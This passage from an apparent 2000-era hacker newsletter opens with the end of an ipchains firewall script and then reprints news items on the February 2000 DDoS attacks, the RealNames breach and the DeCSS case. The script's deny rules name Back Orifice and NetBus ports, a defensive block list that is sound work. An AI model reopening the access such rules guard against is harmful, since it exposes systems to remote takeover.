      echo "Done!"
      
      # ----------------------------------Set telnet, www and FTP for minimum delay -
      # This section manipulates the Type Of Service (TOS) bits of the 
      # packet. For this to work, you must have CONFIG_IP_ROUTE_TOS enabled
      # in your kernel
      
      echo -n "[standalone] TOS flags.."
      
      $IPCHAINS -A output -p tcp -d 0/0 www -t 0x01 0x10
      $IPCHAINS -A output -p tcp -d 0/0 telnet -t 0x01 0x10   
      $IPCHAINS -A output -p tcp -d 0/0 ftp -t 0x01 0x10
      echo -n "..."
      
      # Set ftp-data for maximum throughput
      $IPCHAINS -A output -p tcp -d 0/0 ftp-data -t 0x01 0x08
      echo -n "."
      
      echo "Done!"
      
      # ---------------------------------------------------------- Trusted Networks -
      # Add in any rules to specifically allow connections from hosts/nets that
      # would otherwise be blocked.
      
      # echo -n "[standalone] Trusted Networks.."
      
      # $IPCHAINS -A input -s [trusted host/net] -d $LOCALNET <ports> -j ACCEPT 
      # echo -n "."
      
      # echo "Done!"
      
      # ----------------------------------------------------------- Banned Networks -
      # Add in any rules to specifically block connections from hosts/nets that
      # have been known to cause you problems. These packets are logged.
      
      # echo -n "[standalone] Banned Networks.."
      
      # This one is generic
      # $IPCHAINS -A input -l -s [banned host/net] -d $LOCALNET <ports> -j DENY
      # echo -n "."
      
      # This one blocks ICMP attacks
      # $IPCHAINS -A input -l -b -i $LOCALIF -p icmp -s [host/net] -d $LOCALNET -j DENY
      # echo -n "."
      
      # echo "Done!"
      
      # ------------------------------------------------------ @home-specific rules -
      # This @home stuff is pretty specific to me (terminus).  I get massive port
      # scans from my neighbors and from pokey admins at @home, so I just got harsh
      # and blocked all their stuff, with a few exceptions, listed below.
      #
      # If someone out there finds out the ip ranges of JUST tci@home, let me know
      # so i don't end up blocking ALL cablemodems like it's doing now.
      
      echo -n "[standalone] Cable Modem Nets.."
      
      # so we can check mail, use the proxy server, hit @home's webpage.
      # you will want to set these to your local servers, and uncomment them
      
      # $IPCHAINS -A input -p tcp -s ha1.rdc1.wa.home.com -d $LOCALNET 1023:65535 -j ACCEPT
      # $IPCHAINS -A input -p tcp -s mail.tcma1.wa.home.com -d $LOCALNET 1023:65535 -j ACCEPT
      # $IPCHAINS -A input -p tcp -s www.tcma1.wa.home.com -d $LOCALNET 1023:65355 -j ACCEPT
      # $IPCHAINS -A input -p tcp -s proxy.tcma1.wa.home.com -d $LOCALNET 1023:65535  -j ACCEPT
      # echo -n "...."
      
      # so we can resolve the above hostnames, allow dns queries back to us
      # $IPCHAINS -A input -p tcp -s ns1.home.net -d $LOCALNET 1023:65535 -j ACCEPT
      # $IPCHAINS -A input -p tcp -s ns2.home.net -d $LOCALNET 1023:65535 -j ACCEPT
      # $IPCHAINS -A input -p udp -s ns1.home.net -d $LOCALNET 1023:65535 -j ACCEPT
      # $IPCHAINS -A input -p udp -s ns2.home.net -d $LOCALNET 1023:65535 -j ACCEPT
      # echo -n ".."
      
      # linux ipchains building script page (I think)
      # $IPCHAINS -A input -p tcp -s 24.128.61.117 -d $LOCALNET 1023:65535 -j  ACCEPT
      # echo -n "."
      
      # Non-@home users may want to leave this uncommented, just to block all
      # the wannabe crackers. Add any @home hosts you want to allow BEFORE this line.
      
      # Blast all other @home connections into infinity and log them.
      $IPCHAINS -A input -l -s 24.0.0.0/8 -d $LOCALNET -j DENY
      echo -n "."
      
      echo "Done!"
      
      # ---------------------------- Specific port blocks on the external interface -
      # This section blocks off ports/services to the outside that have
      # vulnerabilities. This will not affect the ability to use these services
      # within your network. 
      
      echo -n "[standalone] Port Blocks.."
       
      # NetBEUI/Samba
      $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 139 -j DENY
      $IPCHAINS -A input -p udp -s $REMOTENET -d $LOCALNET 139 -j DENY
      echo -n "."
      
      # Microsoft SQL
      $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 1433 -j DENY
      $IPCHAINS -A input -p udp -s $REMOTENET -d $LOCALNET 1433 -j DENY
      echo -n "."
      
      # Postgres SQL
      
      $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 5432 -j DENY
      $IPCHAINS -A input -p udp -s $REMOTENET -d $LOCALNET 5432 -j DENY
      echo -n "."
      
      # Network File System
      $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 2049 -j DENY
      $IPCHAINS -A input -p udp -s $REMOTENET -d $LOCALNET 2049 -j DENY
      echo -n "."
      
      # X Displays :0-:2-
      $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 5999:6003 -j DENY
      $IPCHAINS -A input -p udp -s $REMOTENET -d $LOCALNET 5999:6003 -j DENY
      echo -n "."
      
      # X Font Server :0-:2-
      $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 7100 -j DENY
      $IPCHAINS -A input -p udp -s $REMOTENET -d $LOCALNET 7100 -j DENY
      echo -n "."
      
      # Back Orifice (logged)
      $IPCHAINS -A input -l -p tcp -s $REMOTENET -d $LOCALNET 31337 -j DENY
      $IPCHAINS -A input -l -p udp -s $REMOTENET -d $LOCALNET 31337 -j DENY
      echo -n "."
      
      # NetBus (logged)
      $IPCHAINS -A input -l -p tcp -s $REMOTENET -d $LOCALNET 12345:12346 -j DENY
      $IPCHAINS -A input -l -p udp -s $REMOTENET -d $LOCALNET 12345:12346 -j DENY
      echo -n "."
      
      echo "Done!"
      
      # --------------------------------------------------- High Unprivileged ports -
      # These are opened up to allow sockets created by connections allowed by 
      # ipchains
      
      echo -n "[standalone] High Ports.."
      
      $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 1023:65535 -j ACCEPT
      $IPCHAINS -A input -p udp -s $REMOTENET -d $LOCALNET 1023:65535 -j ACCEPT
      echo -n "."
      
      echo "Done!"
      
      # ------------------------------------------------------------ Basic Services -
      
      echo -n "[standalone] Services.."
      
      # ftp-data (20) and ftp (21)
      # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 20 -j ACCEPT
      # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 21 -j ACCEPT
      # echo -n ".."
      
      # ssh (22)
      # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 22 -j ACCEPT
      # echo -n "."
      
      # telnet (23)
      # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 23 -j ACCEPT
      # echo -n "."
      
      # smtp (25)
      # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 25 -j ACCEPT
      # echo -n "."
      
      # DNS (53)
      $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 53 -j ACCEPT
      $IPCHAINS -A input -p udp -s $REMOTENET -d $LOCALNET 53 -j ACCEPT
      echo -n ".."
      
      # DHCP on LAN side (to make @Home DHCP work) (67/68)
      # $IPCHAINS -A input -i $LOCALIF -p udp -s $REMOTENET -d 255.255.255.255/24 67 -j ACCEPT
      # $IPCHAINS -A output -i $LOCALIF -p udp -s $REMOTENET -d 255.255.255.255/24 68 -j ACCEPT
      # echo -n ".."
      
      # http (80)
      # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 80 -j ACCEPT
      # echo -n "."
      
      # POP-3 (110)
      # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 110 -j ACCEPT
      # echo -n "."
      
      # identd (113)
      $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 113 -j REJECT
      echo -n "."
      
      # nntp (119)
      # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 119 -j ACCEPT
      # echo -n "."
      
      # https (443)
      # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 443 -j ACCEPT
      # echo -n "."
      
      # ICQ Services (it's a server service) (4000)
      # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 4000 -j ACCEPT
      # echo -n "."
      
      echo "Done!"
      
      # ---------------------------------------------------------------------- ICMP -
      
      echo -n "[standalone] ICMP Rules.."
      
      # Use this to deny ICMP attacks from specific addresses
      # $IPCHAINS -A input -b -i $EXTERNALIF -p icmp -s <address> -d 0/0 -j DENY
      # echo -n "."
      
      # Allow incoming ICMP
      $IPCHAINS -A input -p icmp -s $REMOTENET -d $LOCALNET -j ACCEPT
      $IPCHAINS -A input -p icmp -s $REMOTENET -d $LOCALNET -j ACCEPT
      echo -n ".."
      
      # Allow outgoing ICMP
      $IPCHAINS -A output -p icmp -s $LOCALNET -d $REMOTENET -j ACCEPT
      $IPCHAINS -A output -p icmp -s $LOCALNET -d $REMOTENET -j ACCEPT
      echo -n "...."
      
      echo "Done!"
      
      # -------------------------------------------------------- set default policy -
      
      $IPCHAINS -A input -j DENY
      $IPCHAINS -A output -j ACCEPT
      
      echo ""
      echo "[standalone] Finished Establishing Firewall."
      echo "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
      
      
      @HWA      
      
37.0  HNN:Feb 14th:Clinton Calls for Cyber Security Summit. 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Joey 
      As many as 20 top Internet executives are expected to
      meet with President Clinton, Attorney General Janet
      Reno and security advisers Tuesday. The
      Internet-security summit with high-tech industry leaders
      will be used to plot a response to this week's stunning
      attacks on the Web's most popular sites. (Hope they
      invite some people who understand the technology so
      that they don't overreact and do something stupid.) 

      WSJ Interactive Edition - via ZD Net        
      http://www.zdnet.com/zdnn/stories/news/0,4586,2436551,00.html?chkpt=zdnntop
      
      @HWA
      
38.0  HNN:Feb 14th:Black, White, Grey, Where Exactly is the Line. 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Adam 
      This New York Times articles makes a lot of assumptions
      which we disagree with. The first is that people who
      write security tools should be prosecuted as well as the
      people that use them. This is like blaming car
      manufacturers for auto accidents. When industry has
      proven time and time again that it is not responsive to
      security holes unless it can be proven that the holes do
      in fact exist there is a need, however dangerous, for
      this sort of tool. As for the article's assumption that the
      line between good and bad is somehow getting blurrier
      we feel that it has never been more clear. 

      NY Times       
      http://www.nytimes.com/library/tech/yr/mo/biztech/articles/12hack.html
      (Pay access archives - Ed)
      
      @HWA
      
39.0  HNN:Feb 14th:Italian Cyber Criminals Apprehended 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by rigel 
      Seven Italian cyber criminals were caught by the Italian
      Financial Police last Friday. They have been accused of
      breaking into Swiss Banks, the Universita di Catania,
      Toronto University and others. They have also been
      accused of somehow siphoning money from inter bank
      electronic transfers. The detectives in the case also
      suspect that the group may have broken into web sites
      for money. They have been charged with spying and
      theft of industrial secrets. Officials are still
      investigating. (This information is from a bad
      translation and may not be 100% accurate.) 

      Ilmessaggero - Italian       
      http://www.ilmessaggero.it/hermes/20000212/01_NAZIONALE/INTERNI/Dab.htm
      
      @HWA
      
40.0  HNN:Feb 14th: RealNames Customer Info and CC Numbers Stolen 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Joe 
      RealNames, a company that substitutes complicated
      Web addresses with simple keywords, is warning its
      users that its customer database may have been stolen,
      and that user credit card numbers and passwords may
      have been accessed. (Why are companies storing this
      information? After the transaction is complete they
      have no need to store the number.) 

      C|Net
      http://home.cnet.com/category/0-1005-200-1547688.html
      
      Wired       
      http://www.wired.com/news/business/0,1367,34295,00.html
      
      C|Net
      
      RealNames' customer database hacked 
      By Jim Hu Staff Writer, CNET News.com February 11, 2000, 9:10 a.m. PT 

      RealNames, a company that substitutes complicated Web addresses with 
      simple keywords, is warning its users that its customer database has been 
      hacked, and that user credit card numbers       and passwords may have 
      been accessed.

      The company informed its customers of the security breach in an email 
      written and sent by RealNames chief executive Keith Teare early this 
      morning. 

      "Within the last 24 hours we have identified a situation that may have 
      resulted in our customer information database being compromised, including 
      customer credit card information," the email read. 

      The attacks occurred late Wednesday afternoon, Teare told CNET News.com. 

      A user can register and pay for keywords on RealNames' Web site via credit 
      card by filling out a form that includes personal information, such as his 
      or her name, address and email address. RealNames then stores that       
      information in a database, just like an e-commerce company or domain name 
      registrar would with a customer making an online purchase or registration.

      The perpetrator was able to access customer records, credit card numbers 
      and passwords. But Teare said there was no evidence that any credit card 
      numbers have been used. The company contacted the FBI and participating       
      credit card companies when the hack was discovered. 

      "We've added further security over the last 48 hours," Teare said. 

      RealNames is enlisting Atlanta-based security firm ISS to conduct an 
      audit, Teare said. 

      The attacks on RealNames were not similar to the distributed denial of 
      service (DDoS) attacks inflicted upon major Web sites such as Yahoo, eBay 
      and Amazon.com earlier this week. Those attacks merely shut down the sites 
      for       roughly a three- to five-hour period. The attack on RealNames 
      was more "malicious" with an intent on accessing private information, a 
      customer service representative said. 

      In contrast to the DDoS attacks, the attack on RealNames was aimed at 
      breaking into the company's database and redirecting a number of its 
      Internet keyword URLs to a government site in the People's       Republic 
      of China, Teare said. 

      Because hackers commonly fake an Internet address of origin, Teare could 
      not conclude whether the hacker originated in China. 

      RealNames, based in San Carlos, Calif., has developed a system based on 
      Internet keywords that allows users to type familiar words or phrases to 
      simplify Internet navigation. 

      The concept is designed as an add-on to search engines and directories 
      and to move from point to point on the Internet, the company said. 
      
      Wired;
      
      CCs Stolen From RealNames? 
      by Lynn Burke 

      10:30 a.m. 11.Feb.2000 PST       Internet search tool company RealNames 
      has become the latest site to be cracked by Internet vandals -- only this 
      time tens of thousands of customer credit cards and passwords may have 
      been stolen. 

      RealNames CEO Keith Teare said the San Carlos, California company 
      discovered the intruder late Wednesday afternoon, when user searches for 
      company names were suddenly all routed to www.188.net, a site written 
      entirely in       Chinese and believed to be associated with the Chinese 
      government. 

      "I think it's probably just random," he said. "It was just a wakeup call 
      saying 'Hey, I'm here.'" 

      Teare said a security audit showed someone had gained access to the 
      front-end of the company's system, and admitted the intruder - who is 
      believed to be working from China -- had been there for at least several 
      days prior. 

      Credit card companies have been notified of the security breach, and so 
      far, no one has reported any fraud associated with the RealNames break-in. 

      The company has since updated its security, and says it is confident a 
      similar incident will not happen in the future. And despite what Teare 
      calls a "state of the art" security system that was in place before the 
      break-in, he admits       there may have been some weak links. 

      "I think it would be dishonest to say no, there's nothing we could have 
      done. You can always do more," he said. "We're pretty water-tight from an 
      industry standard, but you can never be diligent enough." 

      RealNames sent a letter out early Friday to customers informing them of 
      the break-in. 

      The email linked the attack on its company to the spate of denial of 
      service attacks that have struck major Internet companies like Yahoo and 
      Amazon. 

      "You may have heard, through recent and widespread media coverage, that 
      several Internet companies have been plagued by the irresponsible and 
      malicious activities of so-called 'hackers,'" the email read. "RealNames, 
      unfortunately,       has also fallen victim to this." 

      But asked on Friday whether he thought a connection existed, Teare said 
      no. 

      "I don't want to speculate, but probably not," he said. 

      Computer security expert Elias Levy agrees. 

      "I would say they seem to be unrelated," he said. "But it does bring home 
      the point that during the last two months there's been a barrage of 
      security breaks, from CD Universe to the denial of service attacks." 

      "Now that Y2K is over, people need to shift their strategy," he said. 
      "There needs to be more investment on security technology, and 
      non-technological means to mitigate the risk." 

      @HWA

      
41.0  HNN: Feb 14th:  Hacker Hijack or Misconfigued Server? 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Ted 
      Envisioneering Group, a Long Island technology
      consulting company, claimed that one of its servers was
      hijacked on two separate days to launch a denial of
      service attack on a major Web site. This particular
      denial of service attack was done with large volumes of
      email. Envisioneering Group President Richard Doherty
      claimed that their servers where 'hijacked by hackers'.
      (Sounds like a misconfigued mail server that allowed
      spam relays to me.) 

      CNN       
      http://www.cnn.com/2000/TECH/computing/02/11/cyber.attacks.01/index.html
      
      Consulting firm says its server was
      used to attack AOL
 
      February 11, 2000
      Web posted at: 6:57 p.m. EST (2357 GMT)
 
      From Interactive Technology Editor D. Ian Hopper and
      Justice Correspondent Pierre Thomas
 
      NEW YORK (CNN) -- Envisioneering Group, a Long Island technology
      consultant, told CNN on Friday that one of its servers was hijacked on two
      separate days to launch a version of a denial of service attack on a major
      Web site. 
 
      In such assaults, hackers hijack multiple third-party computers and use those
      "zombie" computers to flood target sites with data, essentially shutting down
      access to the sites for would-be users. 
 
      The first intrusion was on January 29 and involved using a computer to pass
      large volumes of e-mail from a third party on to a Web site server in an
      attempt to overwhelm the site. 
 
      In the span of 15 minutes, several dozen
      e-mails a second were sent through the
      Envisioneering server to both Yahoo! and
      America Online. 
 
      During the attack, engineers at Envisioneering
      stopped the attack, according to
      Envisioneering Group President Richard
      Doherty. 
 
      "We dumped all the pending mail, and that
      stopped the repeated attacks [on
      Envisioneering]," Doherty said. 
 
      Yahoo! was jammed by messages on Monday.
 
      The Envisoneering server was used again in the
      same fashion on Tuesday, a day when highly
      trafficked Internet sites such as Amazon.com,
      Buy.com and CNN.com were hit with denial
      of service attacks. 
 
      But in the second incident involving his server,
      Doherty says he doesn't know exactly where
      the messages were sent. 
 
      AOL: Assault didn't amount to a
      pinprick 
 
      The first attack could have been a form of target practice to confirm that the
      Envisioneering server was vulnerable with the intention of using it in the later
      attack. 
 
      AOL, for its part, reported no out of the ordinary traffic on either of the
      dates cited by Doherty. The attack had no effect on the huge Internet service
      provider, an AOL spokeswoman said. 
 
      Envisioneering uses Mindspring for its Internet access. but even if a hacker
      somehow gained control of the entire Mindspring network and pointed it at
      AOL, it wouldn't "register a significant amount of volume to cause a
      problem," according to AOL spokesperson Tricia Primrose. 
 
      This is because of Mindspring's relatively small total bandwidth. With the
      known resources of the intruder -- one computer at Envisioneering Group --
      the assault didn't even amount to a pinprick, Primrose said. 
 
      Yahoo! did not immediately return calls for comment. 
 
      AOL has proposed buying Time Warner Inc., the parent company of
      CNN.com. It is awaiting approval from the Federal Trade Commission. 
 
      FBI zeroing in on locations in California, Oregon
 
      Meanwhile, CNN has learned the FBI is zeroing in on undisclosed locations
      in California and Oregon as it attempts to unravel this week's cyber assaults. 
 
      According to sources familiar with the investigations, the FBI is hoping to
      obtain computers that it believes were used in an attack on CNN.com. 
 
      No arrests are considered imminent. 
 
      The FBI's planned action comes after investigators discovered the computer
      system at the University of California at Santa Barbara was used in the
      attack against CNN.com. 
 
      As the smoke begins to clear from the spate of attacks, CNN continues to
      get sporadic reports about other major Web sites assaulted. 
 
      Excite@Home confirmed that it was attacked Wednesday night at 7 p.m.
      PST. The attack lasted about an hour, according to a spokesperson. About
      50 percent of users trying to access the Excite portal and search engine
      couldn't reach the site during the attack, which targeted and overloaded
      routers. Only the Web site was under attack, the @Home cable network
      was not affected.
 
      "We're working with the Internet community to try to find out what's going
      on," says Excite@Home spokesperson Kelly Distefano.
 
      Server compromised
 
      A University of California- Santa Barbara network administrator has
      confirmed that a server at the university was compromised and used in at
      least one of the attacks against major Web sites this week. 
 
      Sources declined to identify the owners of the computers that are being
      targeted. While those owners may emerge as suspects, sources point out
      that their computers might have been programmed without their knowledge. 
 
      Still, the belief is that these computers may have been used to direct
      commands to a computer system at UCSB. 
 
      This computer then flooded the affected Web site with millions of messages
      -- blocking access to customers. 
 
      UCSB administrator Kevin Schmidt said an intruder entered the UCSB
      machine at least twice. After entering the first time to open doors needed
      later, the intruder returned to install a software package designed to carry
      out an attack, Schmidt said. 
 
      The program, once executed, began its assault by sending out connection
      requests to the target Web site creating a "denial of service" attack. 
 
      With enough requests sent to a single Web site, the site can be rendered
      inaccessible to legitimate users. 
 
      In order to conceal the attack, the program began rotating the origination
      addresses of the requests. This method, known generally as "spoofing," is
      used to thwart filters on the target machine designed to identify and weed out
      malicious data. 
 
      Schmidt said the intruder was "sloppy" in his work and failed to destroy all
      the logs monitoring activity on the server. 
 
      "There wasn't a great effort to hide their presence," Schmidt said. "I don't
      think this behavior was atypical" of an untrained hacker. 
 
      How they did it
 
      The intruder entered the UCSB computer through a known vulnerability in
      an installed network service. 
 
      These vulnerabilities are frequently announced through Carnegie Mellon
      University's CERT group, National Infrastructure Protection Center and
      other network security forums. 
 
      To plug the holes, administrators simply need to install patches or
      workarounds. However, with so many individual machines on the Internet
      and other demands competing for the time of a network guru, many
      computers are left unsecured. 
 
      Along with CNN.com, other attacks were carried out against Yahoo!, eBay
      and Amazon.com 
 
      As CNN has reported, the programs needed to make a denial of service
      attack are very simple to find on several Web sites. They are ready-made
      programs that are easy for almost anyone to use. 
     
     @HWA
     
     
42.0  HNN: Feb 14th:   Windows 2000 Has 63,000 Bugs 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by warpathdoc 
      Reporters at Sm@rt reseller claim to have received an
      internal Microsoft memo that says that Windows 2000
      has 63,000 bugs. Windows 2000 is scheduled to ship in
      four days. Microsoft spokes people said that "All
      software ships with issues." (I guess since everyone
      else does it that makes it OK?) 

      Sm@rt Reseller 
      http://www.zdnet.com/zdnn/stories/news/0,4586,2436920,00.html?chkpt=zdhpnews01
      
      @HWA
      
43.0  HNN:Feb 15th: Buffer overflow: DeCSS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      The DeCSS case and how to change a
      Big Business (BB) in today's world


      B y Dr. Z (Nigel Loring) 

      I have watched this case of legal muscling and
      intimidation and just had to comment with an attitude of
      "What are the hackers doing here?" This is BB vs.
      scattered and unfocussed "hackers". Who do I think will
      win? BB of course! Just look at the situation: BB wants to
      establish that they will punish anyone they want by using
      legal bullying tactics. They pick a small entity (the "little
      guy", a son and his father) with a "potential" impact on
      BB's business. It doesn't matter that the "potential"
      adverse effect is not real or logical. The business is
      playing on their own field of expertise, where they know
      the rules and the hacker community doesn't even read the
      rule book. The media love it and BB plays it for all its
      worth. After all, BB has labeled the little guy a "criminal", a
      nerd and a foreigner, and the people who would complain
      are those other nerdy guys (Linux users - and what place
      do they really have in the world high technology order -
      just esoteric). 

      Why do I say that BB will win? Just look at the comments
      in Slashdot's talk-back to the initial indictment: You can
      characterize them as whiny, uninformed, and petulant.
      Suggestions are made that boycotting of BB and
      donations to the little guy are the ways to help. Give me a
      break! Boycotts don't work unless you have an established
      big organization (Green Peace, Sierra Club, NAACP, and
      the Christian Right come to mind). Donations from a few
      hundred (or 10's) of hackers don't merit any stories in any
      media (except in on-line talk-backs where they are buried
      by the high volume of ranting, raving, and novice legal
      opinions). 

      Let me call into question who wants to be called a hacker.
      Check out the L0pht's website and the definition they use.
      Their classic definition is the best and most rewarding:
      doing things (solving problems) in a way that was not
      intended or planned. For myself, I think you should "hack"
      life. Wozniak did it, Gates did it, the Internet originators
      did it, the guy who invented the spreadsheet did it, and
      the L0pht is doing it. Look at what they did - it was
      different and enjoyable, and with dedication, they made a
      difference. Yeah sure, one might get arrogant like Gates,
      but take a look at the others and the L0pht. They're in a
      different mold. 

      So, you have this case against reverse-engineering a
      trade secret and then showing everyone how to do it.
      Let's be brutally frank about it. The legal results are
      guaranteed: If you don't understand the game that is
      going to play out here, you're going to lose. Just slink
      away and let the legal people and BB play the game to get
      what they want. In my opinion, if I was a lawyer for BB I
      would be laughing at the ranting and raving going on by
      the "hackers", and the media's obvious siding with my
      client. I have a no lose situation. I can: Settle out of
      court before trial (BB wins and gags the "little guy");
      settle after starting the trial (BB wins by getting publicity
      that they will pursue by legal bullying anything that THEY
      think might hurt their interests); let the court decide (if
      BB loses, they WIN with a spin-doctoring that says they
      only lost by a technicality in Norway - and man, have
      they punished the little guy with his costs). There you
      have it - end of episode - a clear case of flipping a coin
      with the bet: "Heads I WIN, tails you LOSE." 

      But wait a minute. Aren't you hackers? Can't you see that
      if you learn the game you can change the way things are
      done and get the outcome YOU want? 

      You CAN hack big business and surprise the hell out of the
      CEOs and lawyers. They have a soft underbelly. When a
      company presses legal claims they are playing a high
      stakes game. Usually, they do not play that game unless
      they are pretty confident they can WIN. But sometimes
      they go wrong by underestimating the resourcefulness of
      their opponent and being arrogant. That's a deadly
      combination. 
      
      A classic case comes from years ago when the telephone
      company sued a guy in California for extending his phone
      with a home-made system to connect all the buildings on
      his farm. They claimed that he was setting up an
      exchange and only the phone company wanted to be able
      to do that. The phone company was arrogant and wanted
      to set the precedent that they owned all phone systems.
      They didn't expect that as a ham-radio operator he would
      get the National HAM Radio Operator's Club to support and
      defend him. The phone company lost big-time and this set
      the precedent that the phone company owns ONLY up to
      your property or the box going into your house. Inside,
      you can do whatever you like, so long as it doesn't
      interfere with the phone company's operations. I bet the
      phone company wishes it had never sued that ham-radio
      operator. 
      
      So, this is how you can do the same thing today to the
      DVD Consortium: 
      
      Did you know that owning one (1) share of any public
      stock entitles you (or your proxy) to attend and vote at
      the Annual Stockholders Meeting of that publicly held big
      business? Did you know that you can actually make a few
      statements on the record at those meetings? 
      
      Do you know that Mutual Fund Managers have forced big
      businesses to merge, not to merge (see P&G and
      Warner-Lambert talks in January) or do other business
      things because the Fund Manager has proxy control of
      large amounts of the big business's stocks. Did you know
      that each time big business's stock drops and you find
      that a big business Officer sold his stock just before the
      drop, you can sue him? Yes, you can, and it happens a
      LOT - you just don't hear about it. Big business almost
      always settles out of court before a trial (think they want
      to go to court when they can get rid of the annoyance by
      paying off the complainer - it's almost legal extortion - but
      the complainer has to lose money in the first place for the
      suit to have teeth.) 
      
      The only kicker is: The fewer proxies, the less influence.
      Now, you don't have much clout with one share. But what
      if you, and people who think like you, combine your
      proxies and vote as a block. THIS is power! THIS is what
      will make Big Business's CEO and other company officers
      take notice. THIS is charging onto the playing field with a
      rule book in your hand and power in your pocket. You
      WILL be noticed! You should also realize that only a
      fraction of the stockholders in a company ever assigns
      their proxies to someone; usually BB asks the stockholders
      for their proxies to vote what BB wants. So the
      stockholders meeting attendees represent only a part of
      the total shares in the company. Your block of shares
      then has more clout than you think. If you can get
      enough opposition to the mainline BB view, the Meeting
      notice can even state them. 
      
      It doesn't have to stop there either. If you have a block
      of votes, then the media is going to take notice also. Just
      imagine the story: "Hackers, claiming ethical and economic
      reasons, plan to attend Annual Stockholders Meeting to
      voice opposition to BB's DVD policies." Imagine BB's CEO
      seeing that in his favorite media. That's delicious and
      legal. 
      
      OK, you say you can't get hackers to descend on BB at
      the right time (work schedules, travel, distances, costs).
      PLAY the game. Hack the rules. (Remember, this doesn't
      mean break the rules - just apply them in a different way
      that no one thought of before.) You have proxies - pool
      them! Find a well-respected and ethical organization and
      set up an account that holds stock owned by individuals.
      The sole purpose of the account is non-profit and to vote
      the proxies of that stock as a block. Have ONE person
      with those proxies show up at the meeting. Broadcast it.
      Call up the company and tell them what you plan to do (I
      smile when thinking of that phone call to the Investor
      Relations Department of BB). Remember, the Security and
      Exchange Commission, which allowed the company to raise
      a lot of money by going public, makes BB play by SEC
      rules. If you understand computers you can understand
      the SEC rules. (Ha! Think the lawyers, who study the SEC
      rules, know computers like a hacker does? No Way. The
      lawyers have to hire outside experts --- Hmmm, maybe
      friends of yours.) 

      The beauty of this is that each of you still owns your
      shares of stock. You aren't donating all that money to
      anyone! Later, you can have the stock sold and get
      almost all the money back. 

      Let's look at examples of costs to you: If the Holding
      Company sells it on-line, you might lose a few cents.
      Think of it this way: Honest (and savvy) Holding Company
      sells 1000 shares at $100/share through an on-line broker
      for < $10. If the 1000 shares came from 1000 people then
      the per person cost of the sale would be $0.01! Note that
      the transaction is $100,000 total, but Holding Company
      only expensed $10 total. One on-line broker lets you trade
      up to 5000 shares for <$10. (If you had 5000 shares of
      MSFT (~$100/share) that would be $500,000 traded for
      <$10.) Ahh, the beauty of on-line brokers! Do you feel
      that this cause is worth 1 cent? Now, I know that the
      Holding Company will have some operating expenses too,
      but that can be worked out to cover expenses with full
      disclosure guaranteed. This should be a cause, not a plan
      to make anyone money. 

      Here's another angle in the hack. Your holding company
      can sell all but a small number of the shares in BB #1 after
      the Stockholder's Meeting and buy a lot of BB #2 to get
      ready for BB #2's Stockholder's Meeting. You can rotate
      through a number of them. When you get what you want,
      you cash out. That's what big business would do. Gee,
      isn't that ironic, and a pretty good hack. 

      One noteworthy point at this juncture would be to
      highlight the fact that investment clubs are regulated -
      they are not just informal groups of investors. There is
      paperwork that needs to be filed. For help starting up your
      own investment club, The Motley Fool
      (http://www.fool.com/) has lots of resources that may be
      of assistance. In particular, the "Investment Club" section
      of the Motley Fool may be of interest. 

      Who knows, what you made the company do might please
      other stock investors and you might sell at a profit. But,
      what you've done could also hurt the company's image
      and cause the stock to go down. Ha! (This is where
      you've got to smile.) You will have BB's officers trying
      their hardest to not let the stock drop -- they're working
      in YOUR (a stockholder) best interests (actually they're
      trying to keep their stock options positive and they
      personally lose money if the stock drops). Isn't it funny,
      that while you fight for your cause, they can be fighting
      to not let you (a stockholder) lose any money! Now,
      that's justice! 

      Well, that's the plan. Play the game - Hack life. Use the
      media, don't let them always use you. Don't just vent your
      displeasure on the talk-back, on-line magazines. Make a
      difference!. 
      
      @HWA
      
44.0  HNN: Feb 15th:  Suspects Sought in DDoS Attacks 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Amazing how this has made such big news, fix your routers
      boys!! - Ed
      
      contributed by janoVd 
      According to unnamed ``sources familiar with the
      investigation'' the FBI is preparing to question at least
      two suspects. Coolio and mafiaboy may soon be
      subjected to FBI interrogation. (There is very little in
      the way of confirmable information in this article.
      Please take that into account when reading it.) 

      Washington Post         
      http://www.washingtonpost.com/wp-dyn/business/A51397-2000Feb14.html

      By Ariana Eunjung Cha
      
      and John Schwartz
      
